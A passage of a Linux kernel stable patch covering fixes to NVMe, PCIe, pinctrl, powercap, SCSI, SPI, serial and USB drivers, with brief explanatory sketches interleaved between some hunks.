+ 	if (ret)
+ 		return ret;
+ 
++	if (id->ncap == 0) {
++		/* namespace not allocated or attached */
++		info->is_removed = true;
++		ret = -ENODEV;
++		goto error;
++	}
++
+ 	blk_mq_freeze_queue(ns->disk->queue);
+ 	lbaf = nvme_lbaf_index(id->flbas);
+ 	ns->lba_shift = id->lbaf[lbaf].ds;
+@@ -2107,6 +2114,8 @@ out:
+ 		set_bit(NVME_NS_READY, &ns->flags);
+ 		ret = 0;
+ 	}
++
++error:
+ 	kfree(id);
+ 	return ret;
+ }
+diff --git a/drivers/pci/controller/dwc/pcie-qcom-ep.c b/drivers/pci/controller/dwc/pcie-qcom-ep.c
+index d4c566c1c8725..1c7fd05ce0280 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom-ep.c
++++ b/drivers/pci/controller/dwc/pcie-qcom-ep.c
+@@ -120,6 +120,7 @@
+ 
+ /* ELBI registers */
+ #define ELBI_SYS_STTS				0x08
++#define ELBI_CS2_ENABLE				0xa4
+ 
+ /* DBI registers */
+ #define DBI_CON_STATUS				0x44
+@@ -252,6 +253,21 @@ static void qcom_pcie_dw_stop_link(struct dw_pcie *pci)
+ 	disable_irq(pcie_ep->perst_irq);
+ }
+ 
++static void qcom_pcie_dw_write_dbi2(struct dw_pcie *pci, void __iomem *base,
++				    u32 reg, size_t size, u32 val)
++{
++	struct qcom_pcie_ep *pcie_ep = to_pcie_ep(pci);
++	int ret;
++
++	writel(1, pcie_ep->elbi + ELBI_CS2_ENABLE);
++
++	ret = dw_pcie_write(pci->dbi_base2 + reg, size, val);
++	if (ret)
++		dev_err(pci->dev, "Failed to write DBI2 register (0x%x): %d\n", reg, ret);
++
++	writel(0, pcie_ep->elbi + ELBI_CS2_ENABLE);
++}
++
+ static int qcom_pcie_enable_resources(struct qcom_pcie_ep *pcie_ep)
+ {
+ 	int ret;
+@@ -446,6 +462,7 @@ static const struct dw_pcie_ops pci_ops = {
+ 	.link_up = qcom_pcie_dw_link_up,
+ 	.start_link = qcom_pcie_dw_start_link,
+ 	.stop_link = qcom_pcie_dw_stop_link,
++	.write_dbi2 = qcom_pcie_dw_write_dbi2,
+ };
+ 
+ static int qcom_pcie_ep_get_io_resources(struct platform_device *pdev,
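
The new write_dbi2 hook exists because, as the bracketing in the hunk implies, the controller's DBI2 (shadow) registers only latch writes while the CS2 bit in ELBI space is set; without it the write is silently dropped. A sketch of that window-enable bracket, with plain variables standing in for the memory-mapped registers:

    #include <stdint.h>
    #include <stdio.h>

    static uint32_t elbi_cs2;   /* stand-in for ELBI_CS2_ENABLE */
    static uint32_t dbi2_reg;   /* stand-in for a DBI2 shadow register */

    static void dbi2_write(uint32_t val)
    {
        elbi_cs2 = 1;           /* open the shadow-register window */
        dbi2_reg = val;         /* ignored by hardware if CS2 is clear */
        elbi_cs2 = 0;           /* close the window again */
    }

    int main(void)
    {
        dbi2_write(0x1234);
        printf("dbi2 = 0x%x\n", dbi2_reg);
        return 0;
    }
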
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 48389785d9247..c132839d99dc8 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -6058,3 +6058,15 @@ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a2d, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a2f, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a31, dpc_log_size);
+ #endif
++
++/*
++ * Devices known to require a longer delay before first config space access
++ * after reset recovery or resume from D3cold:
++ *
++ * VideoPropulsion (aka Genroco) Torrent QN16e MPEG QAM Modulator
++ */
++static void pci_fixup_d3cold_delay_1sec(struct pci_dev *pdev)
++{
++	pdev->d3cold_delay = 1000;
++}
++DECLARE_PCI_FIXUP_FINAL(0x5555, 0x0004, pci_fixup_d3cold_delay_1sec);
+diff --git a/drivers/pinctrl/core.c b/drivers/pinctrl/core.c
+index 9e57f4c62e609..f1962866bb814 100644
+--- a/drivers/pinctrl/core.c
++++ b/drivers/pinctrl/core.c
+@@ -1239,17 +1239,17 @@ static void pinctrl_link_add(struct pinctrl_dev *pctldev,
+ static int pinctrl_commit_state(struct pinctrl *p, struct pinctrl_state *state)
+ {
+ 	struct pinctrl_setting *setting, *setting2;
+-	struct pinctrl_state *old_state = p->state;
++	struct pinctrl_state *old_state = READ_ONCE(p->state);
+ 	int ret;
+ 
+-	if (p->state) {
++	if (old_state) {
+ 		/*
+ 		 * For each pinmux setting in the old state, forget SW's record
+ 		 * of mux owner for that pingroup. Any pingroups which are
+ 		 * still owned by the new state will be re-acquired by the call
+ 		 * to pinmux_enable_setting() in the loop below.
+ 		 */
+-		list_for_each_entry(setting, &p->state->settings, node) {
++		list_for_each_entry(setting, &old_state->settings, node) {
+ 			if (setting->type != PIN_MAP_TYPE_MUX_GROUP)
+ 				continue;
+ 			pinmux_disable_setting(setting);
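
The pinctrl fix reads p->state once into old_state and uses that snapshot for both the NULL check and the list walk, so a concurrent update cannot hand the two reads different values. The same single-snapshot rule, sketched with a C11 relaxed atomic load in place of READ_ONCE():

    #include <stdatomic.h>
    #include <stdio.h>

    struct state { const char *name; };

    static _Atomic(struct state *) cur_state;

    static void commit_state(struct state *new_state)
    {
        /* Snapshot once; re-reading cur_state below could observe
         * a different pointer if another thread updates it. */
        struct state *old = atomic_load_explicit(&cur_state,
                                                 memory_order_relaxed);

        if (old)
            printf("tearing down %s\n", old->name);
        atomic_store_explicit(&cur_state, new_state,
                              memory_order_relaxed);
        printf("now at %s\n", new_state->name);
    }

    int main(void)
    {
        struct state def = { "default" }, slp = { "sleep" };

        commit_state(&def);
        commit_state(&slp);
        return 0;
    }
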
+diff --git a/drivers/powercap/dtpm_cpu.c b/drivers/powercap/dtpm_cpu.c
+index 2ff7717530bf8..8a2f18fa3faf5 100644
+--- a/drivers/powercap/dtpm_cpu.c
++++ b/drivers/powercap/dtpm_cpu.c
+@@ -24,7 +24,6 @@
+ #include <linux/of.h>
+ #include <linux/pm_qos.h>
+ #include <linux/slab.h>
+-#include <linux/units.h>
+ 
+ struct dtpm_cpu {
+ 	struct dtpm dtpm;
+@@ -104,8 +103,7 @@ static u64 get_pd_power_uw(struct dtpm *dtpm)
+ 		if (pd->table[i].frequency < freq)
+ 			continue;
+ 
+-		return scale_pd_power_uw(pd_mask, pd->table[i].power *
+-					 MICROWATT_PER_MILLIWATT);
++		return scale_pd_power_uw(pd_mask, pd->table[i].power);
+ 	}
+ 
+ 	return 0;
+@@ -122,11 +120,9 @@ static int update_pd_power_uw(struct dtpm *dtpm)
+ 	nr_cpus = cpumask_weight(&cpus);
+ 
+ 	dtpm->power_min = em->table[0].power;
+-	dtpm->power_min *= MICROWATT_PER_MILLIWATT;
+ 	dtpm->power_min *= nr_cpus;
+ 
+ 	dtpm->power_max = em->table[em->nr_perf_states - 1].power;
+-	dtpm->power_max *= MICROWATT_PER_MILLIWATT;
+ 	dtpm->power_max *= nr_cpus;
+ 
+ 	return 0;
+diff --git a/drivers/powercap/dtpm_devfreq.c b/drivers/powercap/dtpm_devfreq.c
+index 91276761a31d9..612c3b59dd5be 100644
+--- a/drivers/powercap/dtpm_devfreq.c
++++ b/drivers/powercap/dtpm_devfreq.c
+@@ -39,10 +39,8 @@ static int update_pd_power_uw(struct dtpm *dtpm)
+ 	struct em_perf_domain *pd = em_pd_get(dev);
+ 
+ 	dtpm->power_min = pd->table[0].power;
+-	dtpm->power_min *= MICROWATT_PER_MILLIWATT;
+ 
+ 	dtpm->power_max = pd->table[pd->nr_perf_states - 1].power;
+-	dtpm->power_max *= MICROWATT_PER_MILLIWATT;
+ 
+ 	return 0;
+ }
+@@ -54,13 +52,10 @@ static u64 set_pd_power_limit(struct dtpm *dtpm, u64 power_limit)
+ 	struct device *dev = devfreq->dev.parent;
+ 	struct em_perf_domain *pd = em_pd_get(dev);
+ 	unsigned long freq;
+-	u64 power;
+ 	int i;
+ 
+ 	for (i = 0; i < pd->nr_perf_states; i++) {
+-
+-		power = pd->table[i].power * MICROWATT_PER_MILLIWATT;
+-		if (power > power_limit)
++		if (pd->table[i].power > power_limit)
+ 			break;
+ 	}
+ 
+@@ -68,7 +63,7 @@ static u64 set_pd_power_limit(struct dtpm *dtpm, u64 power_limit)
+ 
+ 	dev_pm_qos_update_request(&dtpm_devfreq->qos_req, freq);
+ 
+-	power_limit = pd->table[i - 1].power * MICROWATT_PER_MILLIWATT;
++	power_limit = pd->table[i - 1].power;
+ 
+ 	return power_limit;
+ }
+@@ -110,7 +105,7 @@ static u64 get_pd_power_uw(struct dtpm *dtpm)
+ 		if (pd->table[i].frequency < freq)
+ 			continue;
+ 
+-		power = pd->table[i].power * MICROWATT_PER_MILLIWATT;
++		power = pd->table[i].power;
+ 		power *= status.busy_time;
+ 		power >>= 10;
+ 
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index deed8c909a786..31b5273f43a71 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -3834,8 +3834,15 @@ static int sd_resume(struct device *dev, bool runtime)
+ 
+ static int sd_resume_system(struct device *dev)
+ {
+-	if (pm_runtime_suspended(dev))
++	if (pm_runtime_suspended(dev)) {
++		struct scsi_disk *sdkp = dev_get_drvdata(dev);
++		struct scsi_device *sdp = sdkp ? sdkp->device : NULL;
++
++		if (sdp && sdp->force_runtime_start_on_system_start)
++			pm_request_resume(dev);
++
+ 		return 0;
++	}
+ 
+ 	return sd_resume(dev, false);
+ }
+diff --git a/drivers/spi/spi.c b/drivers/spi/spi.c
+index 151fef199c380..5d046be8b2dd5 100644
+--- a/drivers/spi/spi.c
++++ b/drivers/spi/spi.c
+@@ -3299,33 +3299,52 @@ void spi_unregister_controller(struct spi_controller *ctlr)
+ }
+ EXPORT_SYMBOL_GPL(spi_unregister_controller);
+ 
++static inline int __spi_check_suspended(const struct spi_controller *ctlr)
++{
++	return ctlr->flags & SPI_CONTROLLER_SUSPENDED ? -ESHUTDOWN : 0;
++}
++
++static inline void __spi_mark_suspended(struct spi_controller *ctlr)
++{
++	mutex_lock(&ctlr->bus_lock_mutex);
++	ctlr->flags |= SPI_CONTROLLER_SUSPENDED;
++	mutex_unlock(&ctlr->bus_lock_mutex);
++}
++
++static inline void __spi_mark_resumed(struct spi_controller *ctlr)
++{
++	mutex_lock(&ctlr->bus_lock_mutex);
++	ctlr->flags &= ~SPI_CONTROLLER_SUSPENDED;
++	mutex_unlock(&ctlr->bus_lock_mutex);
++}
++
+ int spi_controller_suspend(struct spi_controller *ctlr)
+ {
+-	int ret;
++	int ret = 0;
+ 
+ 	/* Basically no-ops for non-queued controllers */
+-	if (!ctlr->queued)
+-		return 0;
+-
+-	ret = spi_stop_queue(ctlr);
+-	if (ret)
+-		dev_err(&ctlr->dev, "queue stop failed\n");
++	if (ctlr->queued) {
++		ret = spi_stop_queue(ctlr);
++		if (ret)
++			dev_err(&ctlr->dev, "queue stop failed\n");
++	}
+ 
++	__spi_mark_suspended(ctlr);
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(spi_controller_suspend);
+ 
+ int spi_controller_resume(struct spi_controller *ctlr)
+ {
+-	int ret;
+-
+-	if (!ctlr->queued)
+-		return 0;
++	int ret = 0;
+ 
+-	ret = spi_start_queue(ctlr);
+-	if (ret)
+-		dev_err(&ctlr->dev, "queue restart failed\n");
++	__spi_mark_resumed(ctlr);
+ 
++	if (ctlr->queued) {
++		ret = spi_start_queue(ctlr);
++		if (ret)
++			dev_err(&ctlr->dev, "queue restart failed\n");
++	}
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(spi_controller_resume);
+@@ -4050,8 +4069,7 @@ static void __spi_transfer_message_noqueue(struct spi_controller *ctlr, struct s
+ 	ctlr->cur_msg = msg;
+ 	ret = __spi_pump_transfer_message(ctlr, msg, was_busy);
+ 	if (ret)
+-		goto out;
+-
++		dev_err(&ctlr->dev, "noqueue transfer failed\n");
+ 	ctlr->cur_msg = NULL;
+ 	ctlr->fallback = false;
+ 
+@@ -4067,7 +4085,6 @@ static void __spi_transfer_message_noqueue(struct spi_controller *ctlr, struct s
+ 		spi_idle_runtime_pm(ctlr);
+ 	}
+ 
+-out:
+ 	mutex_unlock(&ctlr->io_mutex);
+ }
+ 
+@@ -4090,6 +4107,11 @@ static int __spi_sync(struct spi_device *spi, struct spi_message *message)
+ 	int status;
+ 	struct spi_controller *ctlr = spi->controller;
+ 
++	if (__spi_check_suspended(ctlr)) {
++		dev_warn_once(&spi->dev, "Attempted to sync while suspended\n");
++		return -ESHUTDOWN;
++	}
++
+ 	status = __spi_validate(spi, message);
+ 	if (status != 0)
+ 		return status;
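
The spi core now tracks suspend in a controller flag that is flipped under the bus lock, and __spi_sync() fails fast with -ESHUTDOWN while it is set rather than racing a stopped queue. A compact userspace sketch of that gate (names illustrative):

    #include <errno.h>
    #include <pthread.h>
    #include <stdio.h>

    #define SUSPENDED 0x1

    static pthread_mutex_t bus_lock = PTHREAD_MUTEX_INITIALIZER;
    static unsigned int flags;

    static void mark_suspended(int on)
    {
        pthread_mutex_lock(&bus_lock);
        if (on)
            flags |= SUSPENDED;
        else
            flags &= ~SUSPENDED;
        pthread_mutex_unlock(&bus_lock);
    }

    static int sync_transfer(void)
    {
        if (flags & SUSPENDED)  /* cheap check, as in __spi_sync() */
            return -ESHUTDOWN;
        puts("transfer runs");
        return 0;
    }

    int main(void)
    {
        mark_suspended(1);
        printf("while suspended: %d\n", sync_transfer());
        mark_suspended(0);
        printf("after resume:    %d\n", sync_transfer());
        return 0;
    }
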
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index 21145eb8f2a9c..b398fba942964 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -486,6 +486,7 @@ static bool sc16is7xx_regmap_volatile(struct device *dev, unsigned int reg)
+ 	case SC16IS7XX_TXLVL_REG:
+ 	case SC16IS7XX_RXLVL_REG:
+ 	case SC16IS7XX_IOSTATE_REG:
++	case SC16IS7XX_IOCONTROL_REG:
+ 		return true;
+ 	default:
+ 		break;
+@@ -1555,6 +1556,10 @@ static int sc16is7xx_probe(struct device *dev,
+ 			goto out_ports;
+ 		}
+ 
++		ret = uart_get_rs485_mode(&s->p[i].port);
++		if (ret)
++			goto out_ports;
++
+ 		/* Disable all interrupts */
+ 		sc16is7xx_port_write(&s->p[i].port, SC16IS7XX_IER_REG, 0);
+ 		/* Disable TX/RX */
+diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c
+index 48bc8a4814ac4..d396ac8b9cedd 100644
+--- a/drivers/usb/core/config.c
++++ b/drivers/usb/core/config.c
+@@ -61,7 +61,7 @@ static void usb_parse_ssp_isoc_endpoint_companion(struct device *ddev,
+ 	desc = (struct usb_ssp_isoc_ep_comp_descriptor *) buffer;
+ 	if (desc->bDescriptorType != USB_DT_SSP_ISOC_ENDPOINT_COMP ||
+ 	    size < USB_DT_SSP_ISOC_EP_COMP_SIZE) {
+-		dev_warn(ddev, "Invalid SuperSpeedPlus isoc endpoint companion"
++		dev_notice(ddev, "Invalid SuperSpeedPlus isoc endpoint companion"
+ 			 "for config %d interface %d altsetting %d ep %d.\n",
+ 			 cfgno, inum, asnum, ep->desc.bEndpointAddress);
+ 		return;
+@@ -83,7 +83,7 @@ static void usb_parse_ss_endpoint_companion(struct device *ddev, int cfgno,
+ 
+ 	if (desc->bDescriptorType != USB_DT_SS_ENDPOINT_COMP ||
+ 			size < USB_DT_SS_EP_COMP_SIZE) {
+-		dev_warn(ddev, "No SuperSpeed endpoint companion for config %d "
++		dev_notice(ddev, "No SuperSpeed endpoint companion for config %d "
+ 				" interface %d altsetting %d ep %d: "
+ 				"using minimum values\n",
+ 				cfgno, inum, asnum, ep->desc.bEndpointAddress);
+@@ -109,13 +109,13 @@ static void usb_parse_ss_endpoint_companion(struct device *ddev, int cfgno,
+ 
+ 	/* Check the various values */
+ 	if (usb_endpoint_xfer_control(&ep->desc) && desc->bMaxBurst != 0) {
+-		dev_warn(ddev, "Control endpoint with bMaxBurst = %d in "
++		dev_notice(ddev, "Control endpoint with bMaxBurst = %d in "
+ 				"config %d interface %d altsetting %d ep %d: "
+ 				"setting to zero\n", desc->bMaxBurst,
+ 				cfgno, inum, asnum, ep->desc.bEndpointAddress);
+ 		ep->ss_ep_comp.bMaxBurst = 0;
+ 	} else if (desc->bMaxBurst > 15) {
+-		dev_warn(ddev, "Endpoint with bMaxBurst = %d in "
++		dev_notice(ddev, "Endpoint with bMaxBurst = %d in "
+ 				"config %d interface %d altsetting %d ep %d: "
+ 				"setting to 15\n", desc->bMaxBurst,
+ 				cfgno, inum, asnum, ep->desc.bEndpointAddress);
+@@ -125,7 +125,7 @@ static void usb_parse_ss_endpoint_companion(struct device *ddev, int cfgno,
+ 	if ((usb_endpoint_xfer_control(&ep->desc) ||
+ 			usb_endpoint_xfer_int(&ep->desc)) &&
+ 				desc->bmAttributes != 0) {
+-		dev_warn(ddev, "%s endpoint with bmAttributes = %d in "
++		dev_notice(ddev, "%s endpoint with bmAttributes = %d in "
+ 				"config %d interface %d altsetting %d ep %d: "
+ 				"setting to zero\n",
+ 				usb_endpoint_xfer_control(&ep->desc) ? "Control" : "Bulk",
+@@ -134,7 +134,7 @@ static void usb_parse_ss_endpoint_companion(struct device *ddev, int cfgno,
+ 		ep->ss_ep_comp.bmAttributes = 0;
+ 	} else if (usb_endpoint_xfer_bulk(&ep->desc) &&
+ 			desc->bmAttributes > 16) {
+-		dev_warn(ddev, "Bulk endpoint with more than 65536 streams in "
++		dev_notice(ddev, "Bulk endpoint with more than 65536 streams in "
+ 				"config %d interface %d altsetting %d ep %d: "
+ 				"setting to max\n",
+ 				cfgno, inum, asnum, ep->desc.bEndpointAddress);
+@@ -142,7 +142,7 @@ static void usb_parse_ss_endpoint_companion(struct device *ddev, int cfgno,
+ 	} else if (usb_endpoint_xfer_isoc(&ep->desc) &&
+ 		   !USB_SS_SSP_ISOC_COMP(desc->bmAttributes) &&
+ 		   USB_SS_MULT(desc->bmAttributes) > 3) {
+-		dev_warn(ddev, "Isoc endpoint has Mult of %d in "
++		dev_notice(ddev, "Isoc endpoint has Mult of %d in "
+ 				"config %d interface %d altsetting %d ep %d: "
+ 				"setting to 3\n",
+ 				USB_SS_MULT(desc->bmAttributes),
+@@ -160,7 +160,7 @@ static void usb_parse_ss_endpoint_companion(struct device *ddev, int cfgno,
+ 	else
+ 		max_tx = 999999;
+ 	if (le16_to_cpu(desc->wBytesPerInterval) > max_tx) {
+-		dev_warn(ddev, "%s endpoint with wBytesPerInterval of %d in "
++		dev_notice(ddev, "%s endpoint with wBytesPerInterval of %d in "
+ 				"config %d interface %d altsetting %d ep %d: "
+ 				"setting to %d\n",
+ 				usb_endpoint_xfer_isoc(&ep->desc) ? "Isoc" : "Int",
+@@ -273,7 +273,7 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 	else if (d->bLength >= USB_DT_ENDPOINT_SIZE)
+ 		n = USB_DT_ENDPOINT_SIZE;
+ 	else {
+-		dev_warn(ddev, "config %d interface %d altsetting %d has an "
++		dev_notice(ddev, "config %d interface %d altsetting %d has an "
+ 		    "invalid endpoint descriptor of length %d, skipping\n",
+ 		    cfgno, inum, asnum, d->bLength);
+ 		goto skip_to_next_endpoint_or_interface_descriptor;
+@@ -281,7 +281,7 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 
+ 	i = d->bEndpointAddress & ~USB_ENDPOINT_DIR_MASK;
+ 	if (i >= 16 || i == 0) {
+-		dev_warn(ddev, "config %d interface %d altsetting %d has an "
++		dev_notice(ddev, "config %d interface %d altsetting %d has an "
+ 		    "invalid endpoint with address 0x%X, skipping\n",
+ 		    cfgno, inum, asnum, d->bEndpointAddress);
+ 		goto skip_to_next_endpoint_or_interface_descriptor;
+@@ -293,7 +293,7 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 
+ 	/* Check for duplicate endpoint addresses */
+ 	if (config_endpoint_is_duplicate(config, inum, asnum, d)) {
+-		dev_warn(ddev, "config %d interface %d altsetting %d has a duplicate endpoint with address 0x%X, skipping\n",
++		dev_notice(ddev, "config %d interface %d altsetting %d has a duplicate endpoint with address 0x%X, skipping\n",
+ 				cfgno, inum, asnum, d->bEndpointAddress);
+ 		goto skip_to_next_endpoint_or_interface_descriptor;
+ 	}
+@@ -301,7 +301,7 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 	/* Ignore some endpoints */
+ 	if (udev->quirks & USB_QUIRK_ENDPOINT_IGNORE) {
+ 		if (usb_endpoint_is_ignored(udev, ifp, d)) {
+-			dev_warn(ddev, "config %d interface %d altsetting %d has an ignored endpoint with address 0x%X, skipping\n",
++			dev_notice(ddev, "config %d interface %d altsetting %d has an ignored endpoint with address 0x%X, skipping\n",
+ 					cfgno, inum, asnum,
+ 					d->bEndpointAddress);
+ 			goto skip_to_next_endpoint_or_interface_descriptor;
+@@ -378,7 +378,7 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 		}
+ 	}
+ 	if (d->bInterval < i || d->bInterval > j) {
+-		dev_warn(ddev, "config %d interface %d altsetting %d "
++		dev_notice(ddev, "config %d interface %d altsetting %d "
+ 		    "endpoint 0x%X has an invalid bInterval %d, "
+ 		    "changing to %d\n",
+ 		    cfgno, inum, asnum,
+@@ -391,7 +391,7 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 	 * them usable, we will try treating them as Interrupt endpoints.
+ 	 */
+ 	if (udev->speed == USB_SPEED_LOW && usb_endpoint_xfer_bulk(d)) {
+-		dev_warn(ddev, "config %d interface %d altsetting %d "
++		dev_notice(ddev, "config %d interface %d altsetting %d "
+ 		    "endpoint 0x%X is Bulk; changing to Interrupt\n",
+ 		    cfgno, inum, asnum, d->bEndpointAddress);
+ 		endpoint->desc.bmAttributes = USB_ENDPOINT_XFER_INT;
+@@ -408,7 +408,7 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 	 */
+ 	maxp = le16_to_cpu(endpoint->desc.wMaxPacketSize);
+ 	if (maxp == 0 && !(usb_endpoint_xfer_isoc(d) && asnum == 0)) {
+-		dev_warn(ddev, "config %d interface %d altsetting %d endpoint 0x%X has invalid wMaxPacketSize 0\n",
++		dev_notice(ddev, "config %d interface %d altsetting %d endpoint 0x%X has invalid wMaxPacketSize 0\n",
+ 		    cfgno, inum, asnum, d->bEndpointAddress);
+ 	}
+ 
+@@ -439,7 +439,7 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 	j = maxpacket_maxes[usb_endpoint_type(&endpoint->desc)];
+ 
+ 	if (maxp > j) {
+-		dev_warn(ddev, "config %d interface %d altsetting %d endpoint 0x%X has invalid maxpacket %d, setting to %d\n",
++		dev_notice(ddev, "config %d interface %d altsetting %d endpoint 0x%X has invalid maxpacket %d, setting to %d\n",
+ 		    cfgno, inum, asnum, d->bEndpointAddress, maxp, j);
+ 		maxp = j;
+ 		endpoint->desc.wMaxPacketSize = cpu_to_le16(i | maxp);
+@@ -452,7 +452,7 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno,
+ 	 */
+ 	if (udev->speed == USB_SPEED_HIGH && usb_endpoint_xfer_bulk(d)) {
+ 		if (maxp != 512)
+-			dev_warn(ddev, "config %d interface %d altsetting %d "
++			dev_notice(ddev, "config %d interface %d altsetting %d "
+ 				"bulk endpoint 0x%X has invalid maxpacket %d\n",
+ 				cfgno, inum, asnum, d->bEndpointAddress,
+ 				maxp);
+@@ -533,7 +533,7 @@ static int usb_parse_interface(struct device *ddev, int cfgno,
+ 	      i < intfc->num_altsetting;
+ 	     (++i, ++alt)) {
+ 		if (alt->desc.bAlternateSetting == asnum) {
+-			dev_warn(ddev, "Duplicate descriptor for config %d "
++			dev_notice(ddev, "Duplicate descriptor for config %d "
+ 			    "interface %d altsetting %d, skipping\n",
+ 			    cfgno, inum, asnum);
+ 			goto skip_to_next_interface_descriptor;
+@@ -559,7 +559,7 @@ static int usb_parse_interface(struct device *ddev, int cfgno,
+ 	num_ep = num_ep_orig = alt->desc.bNumEndpoints;
+ 	alt->desc.bNumEndpoints = 0;		/* Use as a counter */
+ 	if (num_ep > USB_MAXENDPOINTS) {
+-		dev_warn(ddev, "too many endpoints for config %d interface %d "
++		dev_notice(ddev, "too many endpoints for config %d interface %d "
+ 		    "altsetting %d: %d, using maximum allowed: %d\n",
+ 		    cfgno, inum, asnum, num_ep, USB_MAXENDPOINTS);
+ 		num_ep = USB_MAXENDPOINTS;
+@@ -590,7 +590,7 @@ static int usb_parse_interface(struct device *ddev, int cfgno,
+ 	}
+ 
+ 	if (n != num_ep_orig)
+-		dev_warn(ddev, "config %d interface %d altsetting %d has %d "
++		dev_notice(ddev, "config %d interface %d altsetting %d has %d "
+ 		    "endpoint descriptor%s, different from the interface "
+ 		    "descriptor's value: %d\n",
+ 		    cfgno, inum, asnum, n, plural(n), num_ep_orig);
+@@ -625,7 +625,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 	if (config->desc.bDescriptorType != USB_DT_CONFIG ||
+ 	    config->desc.bLength < USB_DT_CONFIG_SIZE ||
+ 	    config->desc.bLength > size) {
+-		dev_err(ddev, "invalid descriptor for config index %d: "
++		dev_notice(ddev, "invalid descriptor for config index %d: "
+ 		    "type = 0x%X, length = %d\n", cfgidx,
+ 		    config->desc.bDescriptorType, config->desc.bLength);
+ 		return -EINVAL;
+@@ -636,7 +636,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 	size -= config->desc.bLength;
+ 
+ 	if (nintf > USB_MAXINTERFACES) {
+-		dev_warn(ddev, "config %d has too many interfaces: %d, "
++		dev_notice(ddev, "config %d has too many interfaces: %d, "
+ 		    "using maximum allowed: %d\n",
+ 		    cfgno, nintf, USB_MAXINTERFACES);
+ 		nintf = USB_MAXINTERFACES;
+@@ -650,7 +650,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 	     (buffer2 += header->bLength, size2 -= header->bLength)) {
+ 
+ 		if (size2 < sizeof(struct usb_descriptor_header)) {
+-			dev_warn(ddev, "config %d descriptor has %d excess "
++			dev_notice(ddev, "config %d descriptor has %d excess "
+ 			    "byte%s, ignoring\n",
+ 			    cfgno, size2, plural(size2));
+ 			break;
+@@ -658,7 +658,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 
+ 		header = (struct usb_descriptor_header *) buffer2;
+ 		if ((header->bLength > size2) || (header->bLength < 2)) {
+-			dev_warn(ddev, "config %d has an invalid descriptor "
++			dev_notice(ddev, "config %d has an invalid descriptor "
+ 			    "of length %d, skipping remainder of the config\n",
+ 			    cfgno, header->bLength);
+ 			break;
+@@ -670,7 +670,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 
+ 			d = (struct usb_interface_descriptor *) header;
+ 			if (d->bLength < USB_DT_INTERFACE_SIZE) {
+-				dev_warn(ddev, "config %d has an invalid "
++				dev_notice(ddev, "config %d has an invalid "
+ 				    "interface descriptor of length %d, "
+ 				    "skipping\n", cfgno, d->bLength);
+ 				continue;
+@@ -680,7 +680,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 
+ 			if ((dev->quirks & USB_QUIRK_HONOR_BNUMINTERFACES) &&
+ 			    n >= nintf_orig) {
+-				dev_warn(ddev, "config %d has more interface "
++				dev_notice(ddev, "config %d has more interface "
+ 				    "descriptors, than it declares in "
+ 				    "bNumInterfaces, ignoring interface "
+ 				    "number: %d\n", cfgno, inum);
+@@ -688,7 +688,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 			}
+ 
+ 			if (inum >= nintf_orig)
+-				dev_warn(ddev, "config %d has an invalid "
++				dev_notice(ddev, "config %d has an invalid "
+ 				    "interface number: %d but max is %d\n",
+ 				    cfgno, inum, nintf_orig - 1);
+ 
+@@ -713,14 +713,14 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 
+ 			d = (struct usb_interface_assoc_descriptor *)header;
+ 			if (d->bLength < USB_DT_INTERFACE_ASSOCIATION_SIZE) {
+-				dev_warn(ddev,
++				dev_notice(ddev,
+ 					 "config %d has an invalid interface association descriptor of length %d, skipping\n",
+ 					 cfgno, d->bLength);
+ 				continue;
+ 			}
+ 
+ 			if (iad_num == USB_MAXIADS) {
+-				dev_warn(ddev, "found more Interface "
++				dev_notice(ddev, "found more Interface "
+ 					       "Association Descriptors "
+ 					       "than allocated for in "
+ 					       "configuration %d\n", cfgno);
+@@ -731,7 +731,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 
+ 		} else if (header->bDescriptorType == USB_DT_DEVICE ||
+ 			    header->bDescriptorType == USB_DT_CONFIG)
+-			dev_warn(ddev, "config %d contains an unexpected "
++			dev_notice(ddev, "config %d contains an unexpected "
+ 			    "descriptor of type 0x%X, skipping\n",
+ 			    cfgno, header->bDescriptorType);
+ 
+@@ -740,11 +740,11 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 	config->desc.wTotalLength = cpu_to_le16(buffer2 - buffer0);
+ 
+ 	if (n != nintf)
+-		dev_warn(ddev, "config %d has %d interface%s, different from "
++		dev_notice(ddev, "config %d has %d interface%s, different from "
+ 		    "the descriptor's value: %d\n",
+ 		    cfgno, n, plural(n), nintf_orig);
+ 	else if (n == 0)
+-		dev_warn(ddev, "config %d has no interfaces?\n", cfgno);
++		dev_notice(ddev, "config %d has no interfaces?\n", cfgno);
